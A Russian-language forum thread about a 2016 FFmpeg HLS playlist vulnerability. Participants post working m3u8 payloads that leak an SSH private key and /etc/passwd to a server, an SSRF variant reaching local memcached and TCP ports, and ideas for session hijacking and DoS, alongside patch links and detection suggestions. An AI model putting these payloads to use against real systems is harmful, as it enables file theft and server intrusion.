Уязвимость в FFMpeg, позволяющая читать любые файлы в системе

Хотя... знаешь, возникла мысль про

concat:header.m3u8|file|header.m3u8|file|...

тут стоит подумать. Но всё равно, я выше небольшую выжимку по файловым менеджерам показал. Даже строчка не утекает.

на ТВ с виндовз

И почему же это так сложно представить? Windows Mobile есть, заточить её под телевизоры труда не составит.

Да, такой болячкой получилось получить 3 строки id_rsa

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:./header.m3u8|subfile,,start,0,end,31,,:///home/USER/.ssh/id_rsa|./header.m3u8|subfile,,start,32,end,96,,:///home/USER/.ssh/id_rsa|./header.m3u8|subfile,,start,97,end,161,,:///home/USER/.ssh/id_rsa
#EXT-X-ENDLIST

Получилось только с полным путём. «~» - не воспринимается. Ровно как и $HOME.

Windows Mobile

умер в 2010 и его больше нет,сейчас есть виндовс-фоне,где все на .net и он не взлетел

и никто в здравом уме не поставит вон-фон на телевизор,темболее что установщик есть только у микрософта и кроме как на мобилки никуда еще не ставили

но по прежнему есть windows CE-для «промышленности»,есго «можно»(теоретически) воткнуть в телевизор,и контракт с микрософтом довольно дешев для винСЕ...но опятьже этим никто не занимается

ибо есть андроид,и ставить и собирать его куда проще
и уж про кол-во софта для андроида по ставнению с вин-* и говорить не стоит

то самое чувство когда под мобильный опенсурс андроид софта в десятки раз больше чем под мобильную винду...только осталось виндена десктопе умереть для полного счастья

Об этом я и говорю.

Тут, как минимум, нужно заранее знать логин пользователя либо домашнюю директорию (оно же может не совпадать, для параноиков).

Нужно ещё проверить, насколько проблема вообще актуальна. Я сводку выше сделал: нигде утечки получить не вышло. Ну т.е. если запускать голый ffmpeg или ffplay на этом файле - да, я могу слить данные. VLC уже не канает. Тамбнейлы - тоже (запрос header.m3u8 видел, но уже он не процессился, соответственно никакие запросы из него не выполнялись). Возможно, что версии сильно старые :)

В любом случае, я выложил архив (Уязвимость в FFMpeg, позволяющая читать любые файлы в системе (комментарий)) и каждый может погонять на своём окружении и, желательно, отрепортить тут. Арчик с последним обновлением уже не актуален, но может кто ещё не обновился :)

Автор статьи говорит, что у него на Убунте работает.

Cпасибо!

Протестил на федоре (ставил nginx), selinux не ругается, в логе при закрытии mpv test-local-header.mkv

127.0.0.1 - - [14/Jan/2016:15:27:05 +0500] "GET /pipInput1.flv?root:x:0:0 HTTP/1.1" 200 1010XXXX "-" "Lavf/5X.4X.101" "-"

127.0.0.1 - - [14/Jan/2016:15:30:31 +0500] "GET /header.m3u8 HTTP/1.1" 206 73 "-" "Lavf/56.40.101" "-"
127.0.0.1 - - [14/Jan/2016:15:30:31 +0500] "GET /header.m3u8 HTTP/1.1" 206 73 "-" "Lavf/5X.4X.101" "-"

127.0.0.1 - - [14/Jan/2016:15:31:28 +0500] "GET /pipInput1.flv?root:x:0:0:root:/root:/bin/bash HTTP/1.1" 200 1565XXXX "-" "Lavf/5X.4X.101" "-"

Я правильно понимаю, что исходя из этого, можно относительно спокойно пользоваться тотемом?

Вот тут я посмеялся.

Кстати, в Ubuntu залатали ещё в 2015.

:~$ ffmpeg -about
ffmpeg version 2.7.4-0ubuntu0.15.10.1 Copyright (c) 2000-2015 the FFmpeg developers
  built with gcc 5.2.1 (Ubuntu 5.2.1-22ubuntu2) 20151010
  configuration: --prefix=/usr --extra-version=0ubuntu0.15.10.1 --build-suffix=-ffmpeg --toolchain=hardened --libdir=/usr/lib/x86_64-linux-gnu --incdir=/usr/include/x86_64-linux-gnu --enable-gpl --enable-shared --disable-stripping --enable-avresample --enable-avisynth --enable-frei0r --enable-gnutls --enable-ladspa --enable-libass --enable-libbluray --enable-libbs2b --enable-libcaca --enable-libcdio --enable-libflite --enable-libfontconfig --enable-libfreetype --enable-libfribidi --enable-libgme --enable-libgsm --enable-libmodplug --enable-libmp3lame --enable-libopenjpeg --enable-openal --enable-libopus --enable-libpulse --enable-librtmp --enable-libschroedinger --enable-libshine --enable-libspeex --enable-libtheora --enable-libtwolame --enable-libvorbis --enable-libvpx --enable-libwavpack --enable-libwebp --enable-libxvid --enable-libzvbi --enable-opengl --enable-x11grab --enable-libdc1394 --enable-libiec61883 --enable-libzmq --enable-libssh --enable-libsoxr --enable-libx264 --enable-libopencv --enable-libx265
  WARNING: library configuration mismatch
  swscale     configuration: --prefix=/usr --extra-version=1 --build-suffix=-ffmpeg --toolchain=hardened --libdir=/usr/lib/x86_64-linux-gnu --incdir=/usr/include/x86_64-linux-gnu --cc=cc --cxx=g++ --enable-gpl --enable-shared --disable-stripping --disable-decoder=libopenjpeg --disable-decoder=libschroedinger --enable-avresample --enable-avisynth --enable-gnutls --enable-ladspa --enable-libass --enable-libbluray --enable-libbs2b --enable-libcaca --enable-libcdio --enable-libflite --enable-libfontconfig --enable-libfreetype --enable-libfribidi --enable-libgme --enable-libgsm --enable-libmodplug --enable-libmp3lame --enable-libopenjpeg --enable-libopus --enable-libpulse --enable-librtmp --enable-libschroedinger --enable-libshine --enable-libsnappy --enable-libsoxr --enable-libspeex --enable-libssh --enable-libtheora --enable-libtwolame --enable-libvorbis --enable-libvpx --enable-libwavpack --enable-libwebp --enable-libx265 --enable-libxvid --enable-libzvbi --enable-openal --enable-opengl --enable-x11grab --enable-libdc1394 --enable-libiec61883 --enable-libzmq --enable-frei0r --enable-libx264 --enable-libopencv
  swresample  configuration: --prefix=/usr --extra-version=1 --build-suffix=-ffmpeg --toolchain=hardened --libdir=/usr/lib/x86_64-linux-gnu --incdir=/usr/include/x86_64-linux-gnu --cc=cc --cxx=g++ --enable-gpl --enable-shared --disable-stripping --disable-decoder=libopenjpeg --disable-decoder=libschroedinger --enable-avresample --enable-avisynth --enable-gnutls --enable-ladspa --enable-libass --enable-libbluray --enable-libbs2b --enable-libcaca --enable-libcdio --enable-libflite --enable-libfontconfig --enable-libfreetype --enable-libfribidi --enable-libgme --enable-libgsm --enable-libmodplug --enable-libmp3lame --enable-libopenjpeg --enable-libopus --enable-libpulse --enable-librtmp --enable-libschroedinger --enable-libshine --enable-libsnappy --enable-libsoxr --enable-libspeex --enable-libssh --enable-libtheora --enable-libtwolame --enable-libvorbis --enable-libvpx --enable-libwavpack --enable-libwebp --enable-libx265 --enable-libxvid --enable-libzvbi --enable-openal --enable-opengl --enable-x11grab --enable-libdc1394 --enable-libiec61883 --enable-libzmq --enable-frei0r --enable-libx264 --enable-libopencv
  postproc    configuration: --prefix=/usr --extra-version=1 --build-suffix=-ffmpeg --toolchain=hardened --libdir=/usr/lib/x86_64-linux-gnu --incdir=/usr/include/x86_64-linux-gnu --cc=cc --cxx=g++ --enable-gpl --enable-shared --disable-stripping --disable-decoder=libopenjpeg --disable-decoder=libschroedinger --enable-avresample --enable-avisynth --enable-gnutls --enable-ladspa --enable-libass --enable-libbluray --enable-libbs2b --enable-libcaca --enable-libcdio --enable-libflite --enable-libfontconfig --enable-libfreetype --enable-libfribidi --enable-libgme --enable-libgsm --enable-libmodplug --enable-libmp3lame --enable-libopenjpeg --enable-libopus --enable-libpulse --enable-librtmp --enable-libschroedinger --enable-libshine --enable-libsnappy --enable-libsoxr --enable-libspeex --enable-libssh --enable-libtheora --enable-libtwolame --enable-libvorbis --enable-libvpx --enable-libwavpack --enable-libwebp --enable-libx265 --enable-libxvid --enable-libzvbi --enable-openal --enable-opengl --enable-x11grab --enable-libdc1394 --enable-libiec61883 --enable-libzmq --enable-frei0r --enable-libx264 --enable-libopencv
  libavutil      54. 27.100 / 54. 27.100
  libavcodec     56. 41.100 / 56. 41.100
  libavformat    56. 36.100 / 56. 36.100
  libavdevice    56.  4.100 / 56.  4.100
  libavfilter     5. 16.101 /  5. 16.101
  libavresample   2.  1.  0 /  2.  1.  0
  libswscale      3.  1.101 /  3.  1.101
  libswresample   1.  2.100 /  1.  2.101
  libpostproc    53.  3.100 / 53.  3.100
Unrecognized option 'about'.
Error splitting the argument list: Option not found

Автор статьи говорит, что он с Убунты хакал. Разве нет?

забыл сказать, mpv 0.13, сейчас обновил еще до 0.14 из репа surfernsk, результат такой же

Да, действительно, он про Gstreamer в Kali Linux говорил.

Нет, баги только в ядре Linux

публикуются.

и баги во всех составных частях Windows

публикуются только те которые захотели опубликовать.
Хреновая статистика получается. ms еще со времен 95 известна практикой скрытых апдэйтов (это когда устанавливаем офис но он при этом и систему апдейтит заодно)

http://www.securitylab.ru/vulnerability/478467.php сегодня появилось на Security Lab.

Кто-нибудь может добавить сигнатуру вирусного видеофайла в базу ClamAV?

Нет. Дело по большому счету не в concat самого видеофайла, а в отсутствии перевода строки в конце скачиваемого плейлиста.

Если даже просто тупо его добавлять, уязвимость будет устранена. То есть проблема как всегда в проверке корректности входных данных.

Вот это мега-фича! Давно ждал.

https://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=7145e80b4f78cff5ed5fee0...

Закрыли. Вот только патч туповатый. Как правильно заметили на хабре:

А почему белый список протоколов? Спека же не запрещает использовать другие, если я правильно понял. Например, бывает удобно играть медиа-файлы через FTP.

Ох уж этот Мишель. Смержу жену, смержу друзей.

То есть с моего десктопа нельзя так просто через эту дыру украсть файлы?

Можно, если подсунуть тебе видеофайл, который на самом деле плейлист, ffmpeg при попытке создать превьюшку может обратиться на указанный в этом плейлисте сервер и передать на него указанный в этом же плейлисте файл, например /etc/passwd.

и самое главное - ВОСПРОИЗВЕДЁТ видео которое в нём записано ? Что-бы пользователь даже не догадался что его хакнули.

Посмотри протокол concat, может можно запихать плейлист в начало файла, попытаться его воспроизвести, а затем сам же это файл с определенного оффсета?

Тред не читай - сразу отвечай! Тут безопасники уже выяснение провели.

Я правильно понимаю, что исходя из этого, можно относительно спокойно пользоваться тотемом?

судя по всему - да.

Не нашёл подтверждения, кроме:

Если вы пользуетесь, скажем, Kali Linux, то, пока будет генерироваться превьюшка, GStreamer передаст на наш сервер в реферере полный путь этого файла. Так мы можем узнать имя пользователя и какую-нибудь ещё непубличную информацию.

т.е. про имя пользователя только в контексте GStreamer. Это ещё дополнительно нужно исхитрится, ведь нужно новую инфекцию прислать и запустить.

Твоя неправда. Всё же дело в HLS парсере: с одной стороны он допускает вложенность плейлистов не больше двух, из корневого плейлиста играет только один вложенный (что соответствует спекам на HLS), с другой, допускает произвольные протоколы в плейлисте. А concat делает ровно то, что должен делать.

Ну, как быстрый - вполне себе. Редко когда HLS используется в связке с FTP или другими протоколами. С другой стороны, согласен, что стоило бы исключить только «внутренние» протоколы, которые может понять только FFmpeg. Но, что бы не говнякать, нужно как-то научиться отличать внутренние от не внутренних. Возможно, какой-то флаг добавится к AVFMT_xxx

Что-то откомментить я там не могу. Ведь WA существуют, почему не указали на оные. Популисты хреновы.

А concat делает ровно то, что должен делать.

Он объединяет бинарные потоки, как и должен. Проблема в том, что ему могут подсунуть текст с uri, но «забыть» последний перевод строки.

Если бы concat был чуть умнее: по содержимому первого потока определял формат, а затем хотя бы минимально заботился корректностью данных…

Достаточно ведь просто давать разрывать текстовые чанки только между строками. Обрабатывать ввод построчно, завершая каждую переводом.

PS. Я понимаю, что тогда нельзя будет и разрезать на куски тупо по размеру, нужен именно анализ формата.

Если бы concat был чуть умнее:

Лучше не надо. Одна «умность» уже довела до сабжевой проблемы :)

Для ClamAV сигнатуры можете написать?

Лучше не надо.

Не надо проверять валидность пользовательского ввода? Тогда имеем, что имеем.

Ещё что-то закоммитили: https://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=6ba42b6482c725a59eb4683...

С «file,xxx» тоже можно что-то интересное сделать?

Ещё одна деталь: протокол file так и остался в разрешённых, значит теоретически можно сливать данные с онлайн конвертеров, отослав им плэйлист с ссылкой на локальный файл. Вебня обычно от отдельного пользователя (или вообще в контейнере) крутится, конечно, но есть шанс и что-нибудь вкусное упереть с сервиса со слабой защитой.

Специально зарегистрировался, чтобы принять участие в этом празднике.

Интересно, что все схватились за этот file:/// и не уделяют внимания другим протоколам. У меня получилось записать (почти) произвольную строку в сокет удалённого memcached, потыкаться в tcp и udp порты удалённого сервера, открыть порт на удалённом сервере.

Все мои примеры предполагают, что мы загружаем сформированный файл куда-то, где его обрабатывают ffmpeg/avconv. Понятно, что это очевидно, я в том смысле, что у меня везде всё подготовлено, выложено на мой сервер и т.п., а не пути типа ./header.m3u8

memcached загружаемый файл:

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://my-server/test.m3u8|http://my-server/memcache.txt
#EXT-X-ENDLIST

test.m3u8 <- у него не должно быть символов после "?"

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://127.0.0.1:11211?

memcache <- тут живёт то, что мы хотим затолкать в memcached.

# /set key_name 0 9000 5\r\nhello\r\n

К сожалению, я пока не нашел способа делать работающие переводы строк, поэтому в порт memcached приезжает вот такое: Результат

GET /set key_name 0 9000 5\r\nhello\r\n HTTP/1.1
User-Agent: Lavf/56.1.0
Accept: */*
Range: bytes=0-
Connection: close
Host: 127.0.0.1:11211
Icy-MetaData: 1

Если у кого-нибудь есть идеи как сделать так, чтобы «GET », «set keyname ... » и «hello» были на разных строках - пишите, очень интересно. Тогда можно было бы, например, засунуть сессию пхп, в которой ты царь, если на сервере php хранит сессии в memcached, что весьма распространено у любителей оптимизировать окружающую действительность. Или, зная движок, отравить ему кэш с тем же успехом и стать админом, например.

Из-за заголовков HTTP так же обламывается идея сходить в сокет к другим локальным сервисам - mysql, php-fpm, smtp, ....

Подключение к tcp/udp порту: Сразу скажу, что записать в порт, как мне кажется, ничего нельзя, но можно проверить, открыт ли он. Собственно проверка зависит от движка (один из рассматриваемых мной постил пустую webm-ку в случае, если порт открыт и не постил ничего, тк ffmpeg/libav выходил с ошибкой в окно, если порт был закрыт.

Загружаемый файл

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
tcp://127.0.0.1:22
#EXT-X-ENDLIST

Слушаем порт Загружаемый файл

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
tcp://127.0.0.1:9000?listen=1?listen_timeout=9999999
#EXT-X-ENDLIST

root@debian-web:~# avconv -i test_tcp_listen_long.webm /tmp/out.ogv
avconv version 11.4-6:11.4-1~deb8u1, Copyright (c) 2000-2014 the Libav developers
  built on Jun  4 2015 19:39:02 with gcc 4.9.2 (Debian 4.9.2-10)
// тут оно зависает, пока не придут данные
test_tcp_listen_long.webm: Invalid data found when processing input
root@debian-web:~# 

Подключался так:

root@debian-web:~# nc 127.0.0.1 9000
xxx 
xxx
^C
root@debian-web:~# 

Возможно открытие порта можно использовать для DOS, просто выбрав все порты на сервере. Подключение по tcp/udp тоже можно так использовать, сделав локально (в обход файрволов) много подключений к ... да к любому сервису в общем то - веб, fpm, бд, всё, у чего могут закончиться соединения.

Я экспериментировал на локальном компе и на одной аиб, не будем называть имён (это был синч).

Это всё уже не актуально, т.к. протоколы в HLS теперь проверяются по белому списку. Актуальной осталась кража файлов с онлайн-конвертеров.

В какой версии пофиксили?

В этих: https://twitter.com/FFmpeg/status/688187976132603904

Сигнатуру чего? Валидного m3u8 файла? Врядли. Да и дел с ним не имел. Но можете попробовать сами, если ClamAV такое умеет: - определить, что это плей-лист - если последняя строка начинается на http (или другой сетевой протокол) и не оканчивается на \n, заподозрить что-то неладное. - или, если одна из строк начинается на concat:, а первый аргумент - что-то сетевое, заподозрить что-то неладное.

Не нужно усложнять там, где этого не требуется. Проблема не в concat, проблема в том, что он используется там, где это явно не предусмотрено. Не допускать такого использования - решение.

Ура! В федорке весьма оперативно выкатили обновления, учитывая что это репы rpmfusion. Проверил (спасибо h4tr3d'у) mpv - теперь все ок - лог nginx чист, mpv нвыдает ошибку.

Опенсорц, опенсорц... Дырку он презентовал еще в октябре на конференции. Более двух месяцев её описание лежит на гитхабе.

И только после того, как уже на чистом русском языке на хабре ткнули общественность носом - общественность заволновалась и заставила того чувака написать патч.

Когда я последний раз щупал там не было поддержки субтитров. И на счет нескольких аудиодорожек я тоже что-то сомневаюсь.

ffmpeg может рендерить текст в картинки

Ух ты, не знал о такой фиче.

Пересобрали без concat

Ну вот, а я concat-ом DVD файлы объединял.

почитал подробности и не увидел особенной проблемы в ffmpeg. Скорее, мощь невероятная.

Этож надо, получив текст на входе, умудриться корректно кодировать его в видео! Программу писали какие-то видеофанаты...

почитал подробности и не увидел особенной проблемы в ffmpeg. Скорее, мощь невероятная.

Хоть ссы в глаза всё божья роса)

Этож надо, получив текст на входе, умудриться корректно кодировать его в видео! Программу писали какие-то видеофанаты...

Ничего особенного на самом деле. ffmpeg уже достаточно давно навороченный комбайн и им частично можно заменять видеоредакторы.